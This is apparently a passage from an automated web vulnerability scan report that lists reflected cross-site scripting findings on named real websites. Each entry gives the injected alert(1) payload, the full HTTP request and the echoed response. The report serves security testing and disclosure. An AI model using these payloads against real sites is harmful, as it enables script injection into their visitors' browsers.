<form method="post" action="http://www.mediaite.com/favicon.ico7f12b\"><script>alert(1)</script>8202a0642d4/?_login=f94fcfacb9">
...[SNIP]...

1.80. http://www.minyanville.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.minyanville.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42e91"><a%20b%3dc>acd858b3881 was submitted in the REST URL parameter 1. This input was echoed as 42e91"><a b=c>acd858b3881 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico42e91"><a%20b%3dc>acd858b3881 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.minyanville.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 21:40:54 GMT
Server: Apache
Set-Cookie: PHPSESSID=a5nf88p7sfb110tbih2q562pc1; expires=Fri, 01 Apr 2011 06:00:54 GMT; path=/; domain=.minyanville.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=a5nf88p7sfb110tbih2q562pc1; expires=Sun, 01-Jun-2014 07:27:34 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 14750


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<meta property="og:url" content="http://www.minyanville.com/favicon.ico42e91"><a b=c>acd858b3881"/>
...[SNIP]...

1.81. http://www.mnn.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mnn.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5074a"><script>alert(1)</script>0868326e682 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico5074a"><script>alert(1)</script>0868326e682 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mnn.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4.5 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-3ubuntu4.5
Cache-Control: public, max-age=1800
Last-Modified: Thu, 31 Mar 2011 21:43:30 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1301607810"
Content-Type: text/html; charset=utf-8
X-Cacheable: NO: beresp.status
X-Cacheable-status: 404
Content-Length: 37611
Date: Thu, 31 Mar 2011 21:42:44 GMT
X-Varnish: 1726420991
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml"
xmlns:og="http://
...[SNIP]...
<meta property="og:url" content="http://www.mnn.com/favicon.ico5074a"><script>alert(1)</script>0868326e682"/>
...[SNIP]...

1.82. http://www.motime.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.motime.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77908"><script>alert(1)</script>f5f1cf68a57 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico77908"><script>alert(1)</script>f5f1cf68a57 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.motime.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.63
Date: Thu, 31 Mar 2011 20:44:30 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.12-pl0-gentoo
Edge-control: bypass-cache=on
Content-Length: 34341

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" name="returnurl" value="/favicon.ico77908"><script>alert(1)</script>f5f1cf68a57" />
...[SNIP]...

1.83. http://www.motime.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.motime.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95621</script><script>alert(1)</script>c7269d76e3a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico95621</script><script>alert(1)</script>c7269d76e3a HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.motime.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.63
Date: Thu, 31 Mar 2011 20:44:44 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.12-pl0-gentoo
Edge-control: bypass-cache=on
Content-Length: 34307

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<script type="text/javascript">
_dadanet.registerStartup(
['classes/FormManager', 'classes/CommObjects'],
function()
{
var co_opts = {


uri: 'http://www.motime.com/favicon.ico95621</script><script>alert(1)</script>c7269d76e3a',
dict:{
'op_in_progress_desc': '',
'is_friend': 'We are friends',
'invite_already_send': 'Invite already sent',
'invite_send': 'Invitation sent',
'invite_blocked': 'Invites blocked by user',
'is_fan'
...[SNIP]...

1.84. http://www.mp3raid.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mp3raid.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3337a"><script>alert(1)</script>b4d26af53b9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico3337a"><script>alert(1)</script>b4d26af53b9 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mp3raid.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 20:51:46 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.1
X-Powered-By: PHP/5.3.1
Content-Length: 5940
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><TITLE>404 Page Not Fou
...[SNIP]...
<a href="http://www.addthis.com/bookmark.php?v=250&pub=burkul" onmouseover="return addthis_open(this, '', 'http://www.mp3raid.com/favicon.ico3337a"><script>alert(1)</script>b4d26af53b9', '404 Page Not Found')" onmouseout="addthis_close()" onclick="return addthis_sendto()">
...[SNIP]...

1.85. http://www.mp3raid.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mp3raid.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f569e<script>alert(1)</script>62a34c3c606 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icof569e<script>alert(1)</script>62a34c3c606 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mp3raid.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 20:51:46 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.1
X-Powered-By: PHP/5.3.1
Content-Length: 5934
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><TITLE>404 Page Not Fou
...[SNIP]...
<h1>The page /favicon.icof569e<script>alert(1)</script>62a34c3c606 not found!</h1>
...[SNIP]...

1.86. http://www.mycricket.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycricket.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29072</script><script>alert(1)</script>d9a3c1f9652 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico29072</script><script>alert(1)</script>d9a3c1f9652 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mycricket.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 20:33:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.14-pl0-gentoo
Set-Cookie: mycricket_rdi=dc812ba1d17cdbd2a7f9dbf2bcf7eec6; path=/
Content-Type: text/html; charset=utf-8
Content-Length: 30848

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
    <title>invalid page | Cricke
...[SNIP]...
pe="text/javascript">
var hbx=new Object();hbx.vpc="HBX0150.02e";hbx.gn="ehg-reddoor.hitbox.com";

//BEGIN EDITABLE SECTION
//CONFIGURATION VARIABLES
hbx.acct="DM560614E2RE94EN3";
hbx.mlc="/favicon.ico29072</script><script>alert(1)</script>d9a3c1f9652"; //multi-level content category

//alert('tmpl: hbx_page_code_for_error_pages');

try{
eval ('data = ' + $.cookie('data'));
var hbxCommerceVars={};
hbxCommerceVars.pv="0"; //product
...[SNIP]...

1.87. http://www.mylifetime.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mylifetime.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73daa"><a>7dd5ddc4d44 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico73daa"><a>7dd5ddc4d44 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mylifetime.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Thu, 31 Mar 2011 20:28:39 GMT
X-Pingback: http://www.mylifetime.com/xmlrpc.php
X-Lt-Cache: CACHE_PAGE_set
X-Lt-Cache-key: http://www.mylifetime.com/favicon.ico73daa"><a>7dd5ddc4d44
Realserver: prodweb15
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 31 Mar 2011 20:28:42 GMT
Date: Thu, 31 Mar 2011 20:28:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 70359

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<img src="http://pixel.quantserve.com/pixel/p-84eTroxoNX3JE.gif?labels=MYLT:Favicon.ico73daa"><a>7dd5ddc4d44" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
...[SNIP]...

1.88. http://www.mylifetime.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mylifetime.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f2267'%3b18c314fa453 was submitted in the REST URL parameter 1. This input was echoed as f2267';18c314fa453 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.icof2267'%3b18c314fa453 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mylifetime.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Thu, 31 Mar 2011 20:29:39 GMT
X-Pingback: http://www.mylifetime.com/xmlrpc.php
X-Lt-Cache: CACHE_PAGE_set
X-Lt-Cache-key: http://www.mylifetime.com/favicon.icof2267'%3b18c314fa453
RealServer: prodweb7
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 31 Mar 2011 20:29:41 GMT
Date: Thu, 31 Mar 2011 20:29:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 70329

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<script type="text/javascript">refresh_rate = 1;
hbx_ad_refresh_page = 'index';
hbx_ad_refresh_apath = '_favicon.icof2267';18c314fa453';</script>
...[SNIP]...

1.89. http://www.neoseeker.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.neoseeker.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a805e<script>alert(1)</script>a14fd80a43b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoa805e<script>alert(1)</script>a14fd80a43b HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.neoseeker.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Thu, 31 Mar 2011 21:40:11 GMT
Server: Apache/2.2.17 (FreeBSD)
X-Powered-By: PHP/5.3.6
Vary: Accept-Encoding
Content-Length: 2487
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html id="error">
<head>
<title>Neoseeker - Error 404 : File Not Found</title>
<link ty
...[SNIP]...
<span class="location">/favicon.icoa805e<script>alert(1)</script>a14fd80a43b</span>
...[SNIP]...

1.90. http://www.nydailynews.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nydailynews.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd33a'%3balert(1)//53648ea2dc8 was submitted in the REST URL parameter 1. This input was echoed as cd33a';alert(1)//53648ea2dc8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.icocd33a'%3balert(1)//53648ea2dc8 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nydailynews.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 20:10:01 GMT
Server: Apache
Keep-Alive: timeout=3, max=996
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Content-Length: 71952

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://www.nydailynews.com/favicon.icocd33a';alert(1)//53648ea2dc8';
}
//-->
...[SNIP]...

1.91. http://www.oodle.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oodle.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dca48"-alert(1)-"68a04308ce8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.icodca48"-alert(1)-"68a04308ce8 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.oodle.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Thu, 31 Mar 2011 20:18:13 GMT
Content-Length: 23651
Connection: close
Set-Cookie: otu=fe75a440deaac6393547d49430d62e2c; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: ots=383e0a59e5628c72a07ba15b71f4fe92; path=/; domain=.oodle.com
Set-Cookie: a=dT1FN0UxMDZFQjREOTRFMTg1; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
-_--_--_-";
odl.reporting.replyExtraFields = "usa-_-nonclassifieds-_-nonclassifieds-_--_-www-_-USA-_-oodle-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds favicon.icodca48"-alert(1)-"68a04308ce8","10000000","usa-_-nonclassifieds-_-nonclassifieds-_-www USA-_-www-_-USA-_-oodle-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.92. http://www.oodle.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oodle.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9f94"><script>alert(1)</script>5e88123921 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoa9f94"><script>alert(1)</script>5e88123921 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.oodle.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Thu, 31 Mar 2011 20:18:12 GMT
Content-Length: 23695
Connection: close
Set-Cookie: otu=a46d7c6985fa9299c057d4f220572c37; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: ots=34cbbbc4d13d3dd70d2978245b403213; path=/; domain=.oodle.com
Set-Cookie: a=dT1GQUU3RjlGMTREOTRFMTg0; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/favicon.icoa9f94"><script>alert(1)</script>5e88123921" />
...[SNIP]...

1.93. http://www.pepboys.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pepboys.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3233e'style%3d'x%3aexpression(alert(1))'945f7f3be7c was submitted in the REST URL parameter 1. This input was echoed as 3233e'style='x:expression(alert(1))'945f7f3be7c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /3233e'style%3d'x%3aexpression(alert(1))'945f7f3be7c HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pepboys.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 21:13:35 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.30
Content-Language: en-US
Cache-Control: max-age=300
Expires: Thu, 31 Mar 2011 21:18:35 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=UTF-8
Content-Length: 26462

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Page
...[SNIP]...
<link rel='canonical' href='http://www.pepboys.com/3233e'style='x:expression(alert(1))'945f7f3be7c' />
...[SNIP]...

1.94. http://www.pissedconsumer.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pissedconsumer.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec574"><script>alert(1)</script>bb8cab8ea5b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoec574"><script>alert(1)</script>bb8cab8ea5b HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pissedconsumer.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: 8092e5e7d9115742fe6b5f7c78b1d51b=-; path=/; domain=.pissedconsumer.com
Set-Cookie: mosvisitor=1
Set-Cookie: PHPSESSID=haiefi4aqask1dscuklulaqm85; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 84634
Date: Thu, 31 Mar 2011 22:24:55 GMT
Age: 0
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<a href="http://www.pissedconsumer.com/favicon.icoec574"><script>alert(1)</script>bb8cab8ea5b#comments-section">
...[SNIP]...

1.95. http://www.pissedconsumer.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pissedconsumer.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e736"><script>alert(1)</script>e19151622c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?9e736"><script>alert(1)</script>e19151622c6=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pissedconsumer.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: 8092e5e7d9115742fe6b5f7c78b1d51b=-; path=/; domain=.pissedconsumer.com
Set-Cookie: mosvisitor=1
Set-Cookie: PHPSESSID=quc92hvi0fugdenof2hivgfpe3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 84428
Date: Thu, 31 Mar 2011 22:24:52 GMT
Age: 0
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<a href="http://www.pissedconsumer.com/favicon.ico?9e736"><script>alert(1)</script>e19151622c6=1#comments-section">
...[SNIP]...

1.96. http://www.pronto.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pronto.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8e52e'><script>alert(1)</script>470e1531952 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico8e52e'><script>alert(1)</script>470e1531952 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pronto.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 20:08:52 GMT
Server: Apache/2.2.4 (Fedora)
Content-Type: text/html;charset=ISO-8859-1
Via: CN-5000
Proxy-Connection: Keep-Alive
Content-Length: 90404


            <!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"

...[SNIP]...
<meta content='http://www.pronto.com/favicon.ico8e52e'><script>alert(1)</script>470e1531952' property='og:url'/>
...[SNIP]...

1.97. http://www.rent.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rent.com
